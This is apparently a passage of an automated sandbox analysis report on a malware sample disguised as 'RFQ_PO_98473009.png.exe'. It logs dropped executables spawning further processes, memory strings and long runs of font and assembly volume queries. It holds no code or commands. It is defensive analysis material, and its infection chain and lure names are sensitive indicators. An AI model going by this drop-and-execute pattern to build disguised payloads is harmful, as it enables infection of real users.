                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Process created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe Process created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager(
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.0000000002745000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.0000000002745000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.0000000002591000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagertT}
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: GetLocaleInfoA,10_2_00417A20
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: GetLocaleInfoA,12_2_00417A20
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Queries volume information: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
